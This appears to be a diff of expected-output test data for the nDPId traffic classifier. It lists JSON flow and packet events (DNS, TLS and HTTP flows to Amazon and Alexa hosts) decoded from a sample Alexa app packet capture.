+00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064452,"flow_last_seen":1490976064520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976064520,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":869,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976064452,"flow_last_seen":1490976064578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1490976064578,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":898,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067916,"flow_last_seen":1490976067916,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976067916,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1490976067916,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976067916,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WlhAAEARM1+sECrYrBAqAe2EADUAKHojSVQBAAABAAAAAAAAA2FwaQZhbWF6b24DY29tAAABAAE="} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067916,"flow_last_seen":1490976067916,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976067916,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"api.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1490976067965,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1490976067965,"pkt":"ePiC0\/vCAMDKkaPvCABFAABM1zdAAEARtm+sECoBrBAq2AA17YQAOOTBSVSBgAABAAEAAAAAA2FwaQZhbWF6b24DY29tAAABAAHADAABAAEAAAAsAAQ27x2S"} 00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":899,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976067916,"flow_last_seen":1490976067965,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976067965,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"api.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.29.146"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067968,"flow_last_seen":1490976067968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976067968,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1490976067968,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976067968,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8kvdAAEAGfFusECrYNu8dkqLbAbtu3MorAAAAAKAC\/\/\/lJAAAAgQFtAQCCAoA9ljcAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1490976068061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976068061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw1NlAAOcGk4Q27x2SrBAq2AG7otunydf3btzKLHASH\/7bQAAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1490976068064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976068064,"pkt":"AMDKkaPvePiC0\/vCCABFAAAokvhAAEAGfG6sECrYNu8dkqLbAbtu3Mosp8nX+FAQAVclsgAA"} -00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":903,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976067968,"flow_last_seen":1490976068066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976068066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01023{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":907,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1681,"flow_avg_l4_payload_len":240,"midstream":0,"thread_ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01354{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":909,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3551,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","server_names":"api.amazon.com,wsync.us-east-1.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=api.amazon.com","fingerprint":"1D:A3:CD:C3:06:9E:9B:A0:61:1E:1A:75:55:C1:A8:B0:DC:F8:75:2D"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":958,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071237,"flow_last_seen":1490976071237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071237,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1490976071237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071237,"pkt":"AMDKkaPvePiC0\/vCCABFAAA870hAAEAGV6asECrYNF7ohsHGAFAgR7VrAAAAAKAC\/\/9hTwAAAgQFtAQCCAoA9lojAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":959,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071286,"flow_last_seen":1490976071286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":959,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1490976071286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071286,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8a3lAAEAG23WsECrYNF7ohrJ9AbuRJzFRAAAAAKAC\/\/+CYgAAAgQFtAQCCAoA9looAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":960,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071306,"flow_last_seen":1490976071306,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071306,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":960,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1490976071306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071306,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8mshAAEAGrCasECrYNF7ohrJ+AbvI+MDiAAAAAKAC\/\/+6\/AAAAgQFtAQCCAoA9loqAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067968,"flow_last_seen":1490976067968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976067968,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1490976067968,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976067968,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8kvdAAEAGfFusECrYNu8dkqLbAbtu3MorAAAAAKAC\/\/\/lJAAAAgQFtAQCCAoA9ljcAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1490976068061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976068061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw1NlAAOcGk4Q27x2SrBAq2AG7otunydf3btzKLHASH\/7bQAAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1490976068064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976068064,"pkt":"AMDKkaPvePiC0\/vCCABFAAAokvhAAEAGfG6sECrYNu8dkqLbAbtu3Mosp8nX+FAQAVclsgAA"} +00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":903,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976067968,"flow_last_seen":1490976068066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976068066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01023{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":907,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1681,"flow_avg_l4_payload_len":240,"midstream":0,"thread_ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01354{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":909,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3551,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","server_names":"api.amazon.com,wsync.us-east-1.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=api.amazon.com","fingerprint":"1D:A3:CD:C3:06:9E:9B:A0:61:1E:1A:75:55:C1:A8:B0:DC:F8:75:2D"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":958,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071237,"flow_last_seen":1490976071237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071237,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1490976071237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071237,"pkt":"AMDKkaPvePiC0\/vCCABFAAA870hAAEAGV6asECrYNF7ohsHGAFAgR7VrAAAAAKAC\/\/9hTwAAAgQFtAQCCAoA9lojAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":959,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071286,"flow_last_seen":1490976071286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":959,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1490976071286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071286,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8a3lAAEAG23WsECrYNF7ohrJ9AbuRJzFRAAAAAKAC\/\/+CYgAAAgQFtAQCCAoA9looAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":960,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071306,"flow_last_seen":1490976071306,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071306,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":960,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1490976071306,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071306,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8mshAAEAGrCasECrYNF7ohrJ+AbvI+MDiAAAAAKAC\/\/+6\/AAAAgQFtAQCCAoA9loqAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":961,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071312,"flow_last_seen":1490976071312,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976071312,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":961,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1490976071312,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976071312,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WllAAEARM1ysECrYrBAqAWH5ADUAKtG2BusBAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":961,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071312,"flow_last_seen":1490976071312,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976071312,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":962,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1490976071322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071322,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3TJAAOcGwsc0XuiGrBAq2ABQwcY3D6dGIEe1bHASH\/76HQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":963,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1490976071324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071324,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo70lAAEAGV7msECrYNF7ohsHGAFAgR7VsNw+nR1AQAVdEjwAA"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":964,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071237,"flow_last_seen":1490976071324,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1490976071324,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} 